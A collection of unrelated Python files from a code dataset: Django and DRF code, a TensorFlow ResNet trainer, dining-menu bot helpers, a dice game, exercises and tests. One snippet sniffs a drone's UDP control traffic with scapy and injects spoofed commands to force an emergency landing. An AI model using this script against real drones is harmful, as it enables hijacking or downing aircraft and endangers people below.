product=self._product_obj.id,
image=img['current'][i]), img['images'][i])
return {
"product": pro,
"specific": Product_Specification.objects.values('name', 'value').filter(product=pro.id),
"img": Product_Image.objects.values('image').filter(product=pro.id)
}
def update_extra_data(self, data, ser_data):
extra_d = {}
if ser_data and ('color' in ser_data):
if 'current' in data['color']:
if data['color']['current'] != data['color']['color']:
Product_Color.objects.filter(
product=self._product_obj.id).delete()
for i in data['color']['color']:
ser_data['color'].create(
{"product": self._product_obj, 'color': i})
else:
for i in data['color']['color']:
ser_data['color'].create(
{"product": self._product_obj, 'color': i})
else:
col = Product_Color.objects.filter(
product=self._product_obj.id)
if col.exists():
col.delete()
if ser_data and ('size' in ser_data):
siz = data['size']['size'][0]
typ = data['size']['size'][1]
if 'current' in data['size']:
cur_siz = data['size']['current'][0]
cur_typ = data['size']['current'][1]
if siz != cur_siz:
ser_data['size'].update(Product_Size.objects.get(
product=self._product_obj.id), {"size": siz, "type_size": typ})
elif typ != cur_typ:
ser_data['size'].update(Product_Size.objects.get(
product=self._product_obj.id), {"size": siz, "type_size": typ})
else:
ser_data['size'].create(
{"product": self._product_obj, "size": siz, "type_size": typ})
else:
siz = Product_Size.objects.filter(
product=self._product_obj.id)
if siz.exists():
siz.delete()
if ser_data and ('platform' in ser_data):
if 'platform_current' in data:
if data['platform_current'] != data['platform']:
extra_d['platform'] = ser_data['platform'].update(Product_Platform.objects.get(
product=self._product_obj.id), data['platform'])
else:
extra_d['platform'] = ser_data['platform'].create(
{"product": self._product_obj, "platform": data['platform']})
else:
pl = Product_Platform.objects.filter(
product=self._product_obj.id)
if pl.exists():
pl.delete()
if ser_data and ('recom_use' in ser_data):
if 'recom_use_current' in data:
if data['recom_use_current'] != data['recom_use']:
extra_d['recom_use'] = ser_data['recom_use'].update(Product_Recommended_Use.objects.get(
product=self._product_obj.id), data['recom_use'])
else:
extra_d['recom_use'] = ser_data['recom_use'].create(
{"product": self._product_obj, "recommended_use": data['recom_use']})
else:
recom = Product_Recommended_Use.objects.filter(
product=self._product_obj.id)
if recom.exists():
recom.delete()
if ser_data and ('term_condition' in ser_data):
if 'term_condition_current' in data:
if data['term_condition_current'] != data['term_condition']:
extra_d['term_condition'] = ser_data['term_condition'].update(
Product_Terms_Condition.objects.get(product=self._product_obj.id), data['term_condition'])
else:
extra_d['term_condition'] = ser_data['term_condition'].create(
{"product": self._product_obj, "terms_condition": data['term_condition']})
else:
terms = Product_Terms_Condition.objects.filter(
product=self._product_obj.id)
if terms.exists():
terms.delete()
extra_d['color'] = Product_Color.objects.filter(
product=self._product_obj.id)
extra_d['size'] = Product_Size.objects.filter(
product=self._product_obj.id)
return extra_d
def validate_main_data(self, data):
pro_ser = UpdateSerializer(instance=self._product_obj, data=data)
ser_data = {}
if pro_ser.is_valid():
ser_data['product'] = pro_ser
sp = self.validate_specification(
self._product_obj, data['specific'])
if isinstance(sp, SpecificationSerializer):
ser_data['specific'] = sp
if 'images' in data:
data['images'] = {"images": data['images'],
'current': data['img_current']}
img = self.validate_image(
self._product_obj, data['images'])
if isinstance(img, ImageSerializer):
ser_data['image'] = img
return ser_data
else:
return{"errors": img}
else:
return ser_data
else:
return {"errors": sp} # return error
else:
return {"errors": pro_ser.errors}
def validate_extra_data(self, data):
ser_data = {}
if 'color' in data:
col = self.validate_color(data['color']['color'])
if isinstance(col, ColorSerializer):
ser_data['color'] = col
else:
return {"errors": col}
if 'size' in data:
siz = self.validate_size(data['size']['size'])
if isinstance(siz, SizeSerializer):
ser_data['size'] = siz
else:
return {"errors": siz}
if 'platform' in data:
pl = PlatformSerializer(data={"platform": data['platform']})
if pl.is_valid():
ser_data['platform'] = pl
else:
return {"errors": pl.errors}
if 'recom_use' in data:
recom = RecommendedUseSerializer(
data={"recommended_use": data['recom_use']})
if recom.is_valid():
ser_data['recom_use'] = recom
else:
return {"errors": recom.errors}
if 'term_condition' in data:
term = TermConditionSerializer(
data={"terms_condition": data['term_condition']})
if term.is_valid():
ser_data['term_condition'] = term
else:
return {"errors": term.errors}
if ser_data:
return ser_data
else:
return False
def validate_specification(self, pro, data):
for i in data:
sp = SpecificationSerializer(
data={"name": i['name'], "value": i['value']})
if not sp.is_valid():
return sp.errors
return sp
def validate_image(self, pro, data):
for i in data['images']:
img = ImageSerializer(data={"image": data['images'][i]})
if not img.is_valid():
return img.errors
return img
def validate_color(self, data):
for i in data:
col = ColorSerializer(data={"color": i})
if not col.is_valid():
return col.errors
return col
def validate_size(self, data):
size = SizeSerializer(data={"size": data[0],
"type_size": data[1]})
if not size.is_valid():
return size.errors
return size
|
8,141 | e626a7f3f9241db8684c3b8c1bd79ea49e03490d | import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, Sequential, optimizers
import numpy as np
from tensorflow.compat.v1.keras.backend import set_session
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU
config.log_device_placement = True # to log device placement (on which device the operation ran)
sess = tf.compat.v1.Session(config=config)
set_session(sess)
print('\nTensorflow GPU installed: ' + str(tf.test.is_built_with_cuda()))
print('Is Tensorflow using GPU: \n' + str(tf.test.is_gpu_available()))
class BasicBlock(layers.Layer):
# 残差模块
def __init__(self, filter_num, kernel_size, strides=1):
super(BasicBlock, self).__init__()
# 第一个卷积单元
self.conv1 = layers.Conv1D(filter_num, kernel_size, strides=strides, padding='same')
self.bn1 = layers.BatchNormalization()
self.relu1 = layers.Activation('relu')
# 第二个卷积单元
self.conv2 = layers.Conv1D(filter_num, kernel_size, strides=1, padding='same')
self.bn2 = layers.BatchNormalization()
self.relu2 = layers.Activation('relu')
if strides != 1:
self.downsample = Sequential()
self.downsample.add(layers.Conv1D(filter_num, 1, strides=strides))
else:
self.downsample = lambda x: x
def call(self, inputs, training=None):
out = self.conv1(inputs)
out = self.bn1(out)
out = self.relu1(out)
# 通过第二个卷积单元
out = self.conv2(out)
out = self.bn2(out)
out = self.relu2(out)
# 通过identity模块
identity = self.downsample(inputs)
# 2条路径输出直接相加
output = layers.add([out, identity])
output = tf.nn.relu(output) # 激活函数
return output
class ResNet(keras.Model):
def __init__(self, layer_dims, num_classes=4):
# layer_dims:list[2,2,2,2,2,2]
super(ResNet, self).__init__()
self.stem = Sequential([layers.Conv1D(16, kernel_size=3, strides=1),
layers.BatchNormalization(),
layers.Activation('relu')
])
self.layer1 = self.build_resblock(16, layer_dims[0]) # 512
self.layer2 = self.build_resblock(32, layer_dims[1], kernel_size=5, strides=4) # 128
self.layer3 = self.build_resblock(64, layer_dims[2], kernel_size=5, strides=4) # 32
self.layer4 = self.build_resblock(128, layer_dims[3], strides=2) # 16
self.layer5 = self.build_resblock(256, layer_dims[4], strides=2) # 8
self.layer6 = self.build_resblock(512, layer_dims[5], strides=2) # 4
self.avgpool = layers.GlobalAveragePooling1D() # 512大小的向量: 512*1
self.fc = layers.Dense(num_classes)
def call(self, inputs, training=None):
x = self.stem(inputs)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.layer5(x)
x = self.layer6(x)
x = self.avgpool(x)
x = self.fc(x)
return x
def build_resblock(self, filter_num, blocks, kernel_size=3, strides=1):
# 辅助函数,堆叠filter_num个BasicBlock
res_blocks = Sequential()
# 只有第一个BasicBlock的步长可能不为1,实现下采样
res_blocks.add(BasicBlock(filter_num, kernel_size, strides))
for _ in range(1, blocks): # 其他BasicBlock步长都为1
res_blocks.add(BasicBlock(filter_num, kernel_size, strides=1))
return res_blocks
x_train = np.loadtxt(r'/content/drive/My Drive/Data/x_train').reshape(-1, 512, 1).astype(np.float32)
y_train = np.loadtxt(r'/content/drive/My Drive/Data/y_train').astype(np.int32)
x_test = np.loadtxt(r'/content/drive/My Drive/Data/x_test').reshape(-1, 512, 1).astype(np.float32)
y_test = np.loadtxt(r'/content/drive/My Drive/Data/y_test').astype(np.int32)
train_db = tf.data.Dataset.from_tensor_slices((x_train, y_train)).batch(512)
test_db = tf.data.Dataset.from_tensor_slices((x_test, y_test)).batch(512)
# sample = next(iter(train_db))
# print(sample)
model = ResNet([2,2,2,2,2,2])
model.build(input_shape=(512,512,1))
# conv_net.summary()
# fc_net.summary()
optimizer = optimizers.Adam(lr=1e-3)
train_loss = []
test_acc = []
acc_max = 0
for epoch in range(500):
for step, (x, y) in enumerate(train_db):
with tf.GradientTape() as tape:
# [b,512,1]=>[b,4]
logits = model(x, training=True)
y_onehot = tf.one_hot(y, depth=4)
loss = tf.losses.categorical_crossentropy(y_onehot, logits, from_logits=True)
loss = tf.reduce_mean(loss)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
if step % 100 == 0:
print(epoch, step, 'loss:', float(loss))
train_loss.append(loss)
total_num = 0
total_correct = 0
for x, y in test_db:
logits = model(x)
prob = tf.nn.softmax(logits, axis=1)
pred = tf.argmax(prob, axis=1)
pred = tf.cast(pred, dtype=tf.int32)
correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)
correct = tf.reduce_sum(correct)
total_num += x.shape[0]
total_correct += int(correct)
acc = total_correct / total_num
test_acc.append(acc)
print(epoch, 'acc:', acc)
if acc > acc_max:
acc_max = acc
model.save_weights(r'ResNet/weights.ckpt')
|
8,142 | bf2b3b74f772026328cdd04412455ee758c43d3f | import requests
from google.cloud import datastore
import google.cloud.logging
###Helper functions
def report_error(error_text):
"""Logs error to Stackdriver.
:param error_text: The text to log to Stackdriver
:type error_text: string
"""
client = google.cloud.logging.Client()
logger = client.logger("automated_error_catch")
logger.log_text(error_text)
def get_secrets():
"""Fetches secrets from Datastore and returns them as a list.
"""
client = datastore.Client()
query = client.query(kind='env_vars')
entity = query.fetch()
secrets = list(entity)[0]
return secrets
def format_requisites(text, requisites):
"""If any item requisites specified, adds them to response text data for more holistic response.
:param text: The response text data to be formatted
:type text: string
:param requisites: Contains information food item must comply with (traits, allergens, etc)
:type requisites: dict
"""
traits_text = ''
allergens_text = ''
req_map = {'trait': {'mhealthy': 'healthy'},
'allergens': {'sesame-seed': 'sesame seeds',
'tree-nuts': 'tree nuts',
'wheat_barley_rye': 'wheat or barley or rye'}}
#If traits specified, extract into a string
for i, trait in enumerate(requisites['trait']):
if traits_text:
traits_text += ', '
traits_text += req_map['trait'].get(trait, trait)
traits_text = format_plural(traits_text.rstrip(', '))
#If allergens specified, extract into a string
for i, allergen in enumerate(requisites['allergens']):
if allergens_text:
allergens_text += ', '
allergens_text += req_map['allergens'].get(allergen, allergen)
allergens_text = format_plural(allergens_text.rstrip(', '))
allergens_text = allergens_text.replace('and', 'or')
#Requisite-specific language
if allergens_text:
allergens_text = ' without ' + allergens_text
if traits_text:
traits_text = ' that is ' + traits_text
#Return combined string
if (allergens_text or traits_text) and 'Sorry, that is not available' in text:
traits_text = traits_text.replace(' that is ', '')
text = text.replace('Sorry, ', 'Sorry, ' + traits_text + ' ')
text = text.replace('that is not available', '[meal]')
return text + allergens_text + ' is not available'
else:
return text + traits_text + allergens_text
def format_plural(text):
"""Adds 'and' before last item in list of items.
:param text: The string to be manipulated
:type text: string
"""
if ',' in text:
index = text.rfind(',') + 2
text = text[:index] + 'and ' + text[index:]
return text
def remove_spaces(url_block):
"""Removes spaces in url string to create valid url string.
:param url_block: The url string to be manipulated
:type search: string
"""
temp = ""
for i in range(len(url_block)):
if url_block[i] == ' ':
temp += '+'
else:
temp += url_block[i]
return temp
def check_meal_available(data, meal):
"""Searches response data to check if meal is available at specified location/date.
:param data: MDining API HTTP response data
:type data: dict
:param meal: Name of meal
:type meal: string
"""
for key in data['menu']['meal']:
if data['menu']['meal']['name'].upper() == meal.upper():
if 'course' in data['menu']['meal']:
return True
return False
return False
def check_course_available(data, course):
"""Searches response data to check if course is available in specified meal.
:param data: MDining API HTTP response data
:type data: dict
:param course: Name of course
:type course: string
"""
for i in range(len(data['menu']['meal']['course'])):
for key, value in data['menu']['meal']['course'][i].items():
if key == 'name':
if value.upper() == course.upper():
return True
return False
def check_item_specifications(item, traits, allergens):
"""Returns true if food item is satisfactory with specified traits and allergens.
:param item: Data of specific food item
:type item: dict
:param traits: List of specified traits item must have, can be empty
:type traits: list
:param allergens: List of allergens item cannot have, can be empty
:type allergens: list
"""
#Return false if allergens list isn't empty and any allergens found
if allergens and 'allergens' in item:
for allergen in allergens:
if allergen in item['allergens']:
return False
#Return true if traits list empty
if not traits:
return True
#Return false if traits list isn't empty and any traits are missing
if 'trait' in item:
for trait in traits:
if trait not in item['trait']:
return False
#All traits found, return true
return True
else:
return False
def get_items(data, requisites, formatted):
"""Returns string of food items of each course in response data for
fulfillmentText in response to Dialogflow.
:param data: MDining API HTTP response data
:type data: dict
:param requisites: Contains information food item must comply with (traits, allergens, etc)
:type requisites: dict
:param formatted: True/False - formats response string if true
:type formatted: boolean
"""
returndata = ""
traits = requisites['trait']
allergens = requisites['allergens']
if formatted:
prefix = '\t'
suffix = '\n'
else:
prefix = ''
suffix = ', '
for course in data['menu']['meal']['course']:
item_data = []
datatype = type(course['menuitem'])
if datatype is list:
item_data += course['menuitem']
else:
item_data.append(course['menuitem'])
for item in item_data:
if check_item_specifications(item, traits, allergens) and 'No Service at this Time' not in item['name']:
returndata += (prefix + (item['name']).rstrip(', ') + suffix)
return returndata
def find_item_formatting(possible_matches):
"""Formatting list of possible matches into more natural sentence structure
by removing redundancy:
[Chicken during lunch, chicken wings during lunch, and chicken patty during dinner] ->
[Chicken, chicken wings during lunch, and chicken patty during dinner]
:param possible_matches: List of food items in data that matched user input
:type possible_matches: list
"""
for i in range(len(possible_matches)):
if i == 0:
continue
words = possible_matches[i].split()
#If previous term has same ending ("Dinner") as current term, remove it
if possible_matches[i].split()[-1] == possible_matches[i - 1].split()[-1]:
#8 = amount of characters taken up by [' during ']
length = len(possible_matches[i].split()[-1]) + 8
possible_matches[i - 1] = possible_matches[i - 1][:length*-1]
return possible_matches
def find_matches(course_data, possible_matches, item_in, meal_name, requisites):
"""Appends matches of specified food item in data of an individual course to
list of possible matches.
:param course_data: Chosen course subsection of MDining API HTTP response data
:type course_data: dict
:param possible_matches: List of food items in data that matched user input
:type possible_matches: list
:param item_in: User input food item
:type item_in: string
:param meal_name: Name of meal
:type meal_name: string
:param requisites: Contains information food item must comply with (traits, allergens, etc)
:type requisites: dict
"""
traits = requisites['trait']
allergens = requisites['allergens']
item_data = []
datatype = type(course_data)
if datatype is list:
item_data += course_data
else:
item_data.append(course_data)
for item in item_data:
if check_item_specifications(item, traits, allergens) == False:
continue
if item_in.upper() in item['name'].upper():
if item['name'][-1] == ' ':
item['name'] = item['name'][:-1]
possible_matches.append(item['name'] + ' during ' + meal_name)
return possible_matches
#########################################################################
###Primary Handler Functions
def request_location_and_meal(date_in, loc_in, meal_in, requisites):
"""Handles searching for appropriate data response for valid specified
location and meal entities from ``findLocationAndMeal`` intent.
:param date_in: Input date
:type date_in: string
:param loc_in: Input location
:type loc_in: string
:param meal_in: Input meal
:type meal_in: string
:param requisites: Contains information food item must comply with (traits, allergens, etc)
:type requisites: dict
"""
#preset vars
url = 'http://api.studentlife.umich.edu/menu/xml2print.php?controller=&view=json'
location = '&location='
date = '&date='
meal = '&meal='
#API url concatenation
location += loc_in
meal += meal_in
date += str(date_in)
url = url + location + date + meal
url = remove_spaces(url)
#fetching json
data = requests.get(url).json()
#checking if specified meal available
if check_meal_available(data, meal_in):
returnstring = (get_items(data, requisites, False)).rstrip(', ')
return format_plural(returnstring)
else:
return "No meal is available"
#Handle meal item data request
def request_item(date_in, loc_in, item_in, meal_in, requisites):
"""Handles searching for appropriate data response for valid specified
location and food item entities (and meal entity if included) from ``findItem`` intent.
:param date_in: Input date
:type date_in: string
:param loc_in: Input location
:type loc_in: string
:param item_in: Input food item
:type item_in: string
:param meal_in: Input meal, can be empty string if not specified
:type meal_in: string
:param requisites: Contains information food item must comply with (traits, allergens, etc)
:type requisites: dict
"""
secrets = get_secrets()
url = secrets.get('m_dining_api_main')
location = '&location='
date = '&date='
meal = '&meal='
#API url concatenation
location += loc_in
date += str(date_in)
url = url + location + date + meal
url = remove_spaces(url)
if meal_in == '':
meal_entered = False
else:
meal_entered = True
#fetching json
data = requests.get(url).json()
possible_matches = []
#Loop through meals
for i in data['menu']['meal']:
#If meal specified, only check specified meal
if meal_entered and i['name'].upper() != meal_in.upper():
continue
#Skip meal if no food items available
if 'course' not in i:
continue
#Loop through food items in course
for j in i['course']:
for key, value in j.items():
if key == 'name':
course_data = j['menuitem']
meal_name = i['name']
#Append matches to specified item to possible_matches list
possible_matches = find_matches(course_data, possible_matches,
item_in, meal_name, requisites)
#Specified item found
if possible_matches:
possible_matches = find_item_formatting(possible_matches)
text = 'Yes, there is '
for i in range(len(possible_matches)):
if len(possible_matches) > 1 and (i == len(possible_matches) - 1):
text += ' and'
text += ' ' + possible_matches[i]
if i != len(possible_matches) - 1:
text += ','
#Specified item not found
else:
text = 'Sorry, that is not available'
return {'fulfillmentText': text}
|
8,143 | f3527185117fd7205f55f47f2f08448a7d7b0100 |
import netCDF4 as nc
import numpy as np
import os
def RangeExtender(filename,directory):
fileNC=nc.Dataset(directory+filename,'r')
nu=fileNC['nu'][:]
filename,ext=os.path.splitext(filename)
fileOut=nc.Dataset(directory+filename+"_50000cm-1.nc",'w')
nu_orig_length=len(nu)
step=abs(nu[1]-nu[0])
print(nu,step,len(nu))
nu=[nu[i] for i in range(len(nu))]
count=0
while nu[-1] < 50000*100:
count+=1
if count % 2.5e4 ==0:
print("{0}, {1:6.5e}".format(len(nu),50000*100-nu[-1]),end='\r',flush=True)
nu.append(nu[-1]+step)
print('\n',len(nu))
nu_length=len(nu)
pt_num=len(fileNC['t_calc'])
nu_dim=fileOut.createDimension('nu',nu_length)
pt_pair_dim=fileOut.createDimension('pt_pair',pt_num)
scalar_dim=fileOut.createDimension('scalar',1)
nu_var=fileOut.createVariable('nu','f8',('nu',))
kabs=fileOut.createVariable('kabs','f4',('pt_pair','nu',))
t_calc= fileOut.createVariable('t_calc','f8',('pt_pair',))
p_calc= fileOut.createVariable('p_calc','f8',('pt_pair',))
nu=np.array(nu)
nu_var[:]=nu[:]
nu_var.step=step
t_calc[:]=fileNC['t_calc'][:]
p_calc[:]=fileNC['p_calc'][:]
k_zero=np.zeros(nu_length)
for i in range(pt_num):
print(i,pt_num,end='\r',flush=True)
k_zero_used=np.copy(k_zero)
kabs[i,:]=k_zero_used[:]
kabs[i,:nu_orig_length]=fileNC['kabs'][i,:]
print('')
fileNC.close()
fileOut.close()
filename='abs_coeff_TiO_Toto_TerrestrialAbund_pt800.nc'
directory='/home/dc-ridg1/AbsCoeffs/'
RangeExtender(filename,directory)
|
8,144 | bb540ba4cd96e2485e77ba099f0a1a9ea03e1120 | import random
def multi():
scc = [6, 5, 4]
sc = [6, 5]
cc = [5, 4]
crew = [4]
captain = [5]
ship = [6]
n = 0
while n <= 2:
inp = input("Hit enter to roll")
if inp == "":
roll5 = random.choices(range(1, 7), k=5)
print(roll5)
if set(scc).issubset(roll5):
result_scc = [i for i in roll5 if not i in scc or scc.remove(i)]
total_scc = sum(result_scc)
inp_scc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_scc == "both":
print("Total score: " + str(total_scc) + ".")
if inp_scc == "neither":
roll2_scc = random.choices(range(1, 7), k=2)
print(roll2_scc)
inp_scc_none = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_scc_none == "both":
total_scc_none = sum(roll2_scc)
print("Total score: " + str(total_scc_none) + ".")
if inp_scc_none == "neither":
roll2_scc_none = random.choices(range(1, 7), k=2)
total_scc_none2 = sum(roll2_scc_none)
print(roll2_scc_none)
print("Your total score is: " + str(total_scc_none2) + ".")
if inp_scc_none == "one":
inp_scc_none_one = input("Which die do you want to keep? ")
roll1_scc_none_one = random.randint(1, 6)
total_scc_none_one = roll1_scc_none_one + int(inp_scc_none_one)
print(roll1_scc_none_one)
print("Your total score is: " + str(total_scc_none_one) + ".")
if inp_scc == "one":
inp_scc_one = input("Which die do you want to keep? ")
roll1_scc_one = random.randint(1, 6)
print(roll1_scc_one)
total_scc_one = roll1_scc_one + int(inp_scc_one)
inp_scc_one2 = input("Hit enter to roll again or type 'pass' to keep your score ")
if inp_scc_one2 == "pass":
print("Your total score is: " + str(total_scc_one) + ".")
if inp_scc_one2 == "":
roll1_scc_one2 = random.randint(1, 6)
print(roll1_scc_one2)
total_scc_one2 = roll1_scc_one2 + int(inp_scc_one)
print("Your total score is: " + str(total_scc_one2) + ".")
if set(sc).issubset(roll5):
inp_sc = input("Now you need a 4(the Crew). Hit enter to roll the remaining dice")
if inp_sc == "":
roll3 = random.choices(range(1, 7), k=3)
print(roll3)
if set(crew).issubset(roll3):
result_crew = [i for i in roll3 if not i in crew or crew.remove(i)]
total_crew = sum(result_crew)
inp_crew = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_crew == "both":
print("Total score: " + str(total_crew) + ".")
if inp_crew == "neither":
roll2_crew = random.choices(range(1, 7), k=2)
print(roll2_crew)
total_crew_none = sum(roll2_crew)
print("Your total score is: " + str(total_crew_none) + ".")
if inp_crew == "one":
inp_crew_one = input("Which die do you want to keep? ")
roll1_crew_one = random.randint(1, 6)
print(roll1_crew_one)
total_crew_one = roll1_crew_one + int(inp_crew_one)
print("Your total score is: " + str(total_crew_one) + ".")
else:
inp_sc3 = input("Still no 4. Hit enter to roll again")
if inp_sc3 == "":
roll3_sc3 = random.choices(range(1, 7), k=3)
print(roll3_sc3)
if set(crew).issubset(roll3_sc3):
result_crew_sc3 = [i for i in roll3_sc3 if not i in crew or crew.remove(i)]
total_crew_sc3 = sum(result_crew_sc3)
print("Your total score is: " + str(total_crew_sc3) + ".")
else:
print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
if set(ship).issubset(roll5) and 5 not in roll5 and n < 2:
inp_ship = input(
"Now you need a 5(the Captain) and a 4(the Crew). Hit enter to roll the remaining dice ")
if inp_ship == "":
roll4_ship = random.choices(range(1, 7), k=4)
print(roll4_ship)
if set(cc).issubset(roll4_ship):
result_ship_cc = [i for i in roll4_ship if not i in cc or cc.remove(i)]
total_ship_cc = sum(result_ship_cc)
inp_ship_cc = input("Do you wish to keep one, both, or neither of the remaining dice? ")
if inp_ship_cc == "both":
print("Your total is: " + str(total_ship_cc) + ".")
if inp_ship_cc == "neither":
roll2_cc = random.choices(range(1, 7), k=2)
print(roll2_cc)
total_ship_cc_none = sum(roll2_cc)
print("Your total score is: " + str(total_ship_cc_none) + ".")
if inp_ship_cc == "one":
inp_ship_cc_one = input("Which die do you want to keep? ")
roll1_ship_cc_one = random.randint(1, 6)
print(roll1_ship_cc_one)
total_ship_cc_one = roll1_ship_cc_one + int(inp_ship_cc_one)
print("Your total score is: " + str(total_ship_cc_one) + ".")
if set(captain).issubset(roll4_ship):
roll3_captain = random.choices(range(1, 7), k=3)
print(roll3_captain)
if set(crew).issubset(roll3_captain):
result_ship_captain = [i for i in roll3_captain if not i in crew or crew.remove(i)]
total_ship_captain = sum(result_ship_captain)
print("Your total score is: " + str(total_ship_captain) + ".")
else:
print("Sorry, you get no points because the Ship, Captain, and Crew wasn't completed.")
else:
n = n + 1
inp = input("How many players are there? ")
players = range(int(inp))
roll_dict = dict()
for i in players:
multi() |
8,145 | bf65d4a4e066e3e06b888d4b9ed49e10e66b4e78 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 22 20:21:16 2018
@author: Yijie
"""
#Q4:
#(1)
yours = ['Yale','MIT','Berkeley']
mine = ['Harvard','CAU','Stanford']
ours1 = mine + yours
ours2=[]
ours2.append(mine)
ours2.append(yours)
print(ours1)
print(ours2)
# Difference:the print out results indicate that the list 'ours1' is having
#the objects in 'yours' and 'mine' together, while 'ours2' has a dividing line
# between 'yours' and 'mine'.
#(2) question: do you want to remove something?
yours[1]='Mich'
print(ours1)
print(ours2)
#ours1 stays unchanged while ours2 changed because ours1 is a new list, while ours2 is adding |
8,146 | d9908d1ff155390dcd456dd15f92db03f093089e | #!/usr/bin/env python3
class interceptThread(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.curPkt = None
self.seq = 0
self.foundUAV = False
def run(self):
sniff(prn=self.interceptPkt, filter='udp port 5556')
def interceptPkt(self, pkt):
if self.foundUAV == False:
print('[*] UAV Found.')
self.foundUAV = True
self.curPkt = pkt
raw = pkt.sprintf('%Raw.load%')
try:
self.seq = int(raw.split(',')[0].split('=')[-1]) + 5
except:
self.seq = 0
def injectCmd(self, cmd):
radio = dup.dupRadio(self.curPkt)
dot11 = dup.dupDot11(self.curPkt)
snap = dup.dupSNAP(self.curPkt)
llc = dup.dupLLC(self.curPkt)
ip = dup.dupIP(self.curPkt)
udp = dup.dupUDP(self.curPkt)
raw = Raw(load=cmd)
injectPkt = radio / dot11 / llc / snap / ip / udp / raw
sendp(injectPkt)
EMER = '290717952'
def emergencyland(self):
spoofSeq = self.seq + 100
watch = 'AT*COMWDG=%i\r'%spoofSeq
toCmd = 'AT*REF=%i,%s\r'% (spoofSeq + 1, EMER)
self.injectCmd(watch)
self.injectCmd(toCmd)
|
8,147 | 22504b466cdeb380b976e23e2708e94131722e11 | from django.contrib import admin
from apap.models import *
# Register your models here.
admin.site.register(Doggo)
admin.site.register(Profile) |
8,148 | 7903484b4a36d4b6ea03b9eaf3bf2b2e056baad8 | from setuptools import setup, find_packages
def find_version():
with open('pytest_defer.py') as fp:
for line in fp:
if '__version__' in line:
version = line.split('=')[-1].strip()
return version[1:-1] # trim ''
with open('README.md') as fp:
long_desc = fp.read()
setup(
version=find_version(),
name='pytest-defer',
license='MIT',
long_description=long_desc,
long_description_content_type='text/markdown',
author='Miki Tebeka',
author_email='miki@353solutions.com',
url='https://github.com/tebeka/pytest-defer',
packages=find_packages(),
entry_points={
'pytest11': [
'defer = pytest_defer',
],
},
install_requires=[
'pytest>=6.2',
],
)
|
8,149 | c87f9885e96abdd32df68f9fe1942b2782bd5b96 | # https://stackoverflow.com/questions/69473844/can-you-calculate-the-size-of-a-text-annotation-in-matplotlib
from matplotlib.figure import Figure as mpl_Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg as mpl_Canvas
fig = mpl_Figure()
x, y, text = 5, 7, 'My label text'
fig.gca().plot(x, y, 'k.')
canvas = mpl_Canvas(fig)
t = fig.gca().text(x, y, text, color='red')
canvas.draw()
bbox = t.get_window_extent(renderer = canvas.get_renderer())
fig.gca().plot(
[bbox.x0, bbox.x1, bbox.x1, bbox.x0, bbox.x0],
[bbox.y0, bbox.y0, bbox.y1, bbox.y1, bbox.y0],
'k:',
transform=None)
canvas.print_figure("img.png") |
8,150 | 4488612164435ab062ca66000f0d7dc3ccd89da2 | from rest_framework.permissions import BasePermission, SAFE_METHODS
class IsOwnerOrStaffOrReadOnly(BasePermission):
def has_object_permission(self, request, view, obj):
"""
Переопределяем права доступа.
Даем все права на запись, только владельцу или
администратору, на чтение даем право всем.
Возвращаем `True` если есть разрешение, `False` если нет.
"""
return bool(
request.method in SAFE_METHODS
or
request.user and request.user.is_authenticated
and
(obj.owner == request.user or request.user.is_superuser)
)
def has_permission(self, request, view):
return bool(
request.method in SAFE_METHODS or
request.user and
request.user.is_authenticated
)
|
8,151 | edb80652de641a1a6cbb37a60cc236cd7828a96e |
'''
给定两个整数,被除数 dividend 和除数 divisor。将两数相除,要求不使用乘法、除法和 mod 运算符。
返回被除数 dividend 除以除数 divisor 得到的商
链接:https://leetcode-cn.com/problems/divide-two-integers
'''
# 该题看起来也不难,但是其中坑很多,想要写出健壮的代码并不容易
# 我个人思考可以考虑使用上下界,不断缩小范围来确定
def division(dividend, divisor):
temp = 0
for i in range(dividend + 1):
temp += abs(divisor)
if temp > abs(dividend):
if ((dividend ^ divisor) >> divisor.__sizeof__())^1 > 0:
return i
else :
return -i
return 2**31 - 1
def division_v2(dividend, divisor):
def get_add_num(num, times):
sum = 0
for i in range(times):
sum += num
return sum
low = 0
up = dividend
while low < up:
mid = round((low + up) / 2)
if get_add_num(divisor, mid) < dividend:
low = mid
else:
up = mid
return mid
if __name__ == '__main__':
# print(division(2147483647, 1))
print(division_v2(3, 1))
|
8,152 | 27702f72ae147c435617acaab7dd7e5a5a737b13 | import unittest
import subprocess
import tempfile
import os
import filecmp
import shutil
import cfg
import utils
class TestFunctionalHumannEndtoEndBiom(unittest.TestCase):
"""
Test humann with end to end functional tests
"""
def test_humann_fastq_biom_output(self):
"""
Test the standard humann flow on a fastq input file
Test biom output is written
"""
# create a temp directory for output
tempdir = utils.create_temp_folder("fastq")
# run humann test
command = ["humann","--input",cfg.demo_fastq,"--output",tempdir,
"--output-format", "biom"]
utils.run_humann(command)
# check the output files are as expected
for expression, message in utils.check_output(cfg.expected_demo_output_files_biom, tempdir):
self.assertTrue(expression,message)
# remove the temp directory
utils.remove_temp_folder(tempdir)
def test_humann_fastq_biom_output_pathways(self):
"""
Test the standard humann flow on a fastq input file
Test biom output is written
Test the expected pathways are identified
"""
# create a temp directory for output
tempdir = utils.create_temp_folder("fastq")
# run humann test
command = ["humann","--input",cfg.demo_fastq,"--output",tempdir,
"--output-format", "biom", "--gap-fill", "off"]
utils.run_humann(command)
# check the output file of pathway abundance has the expected pathways
pathways_file_tsv=utils.read_biom_table(os.path.join(tempdir,"demo_pathabundance.biom"))
pathways_found=set([x.split("\t")[0].split(":")[0] for x in filter(lambda x: "PWY" in x, pathways_file_tsv)])
self.assertEqual(pathways_found,cfg.expected_demo_output_files_biom_pathways)
# remove the temp directory
utils.remove_temp_folder(tempdir)
def test_humann_gene_families_biom_input(self):
"""
Test the standard humann flow on a gene families output file as input
Test with the biom format of the gene families file
"""
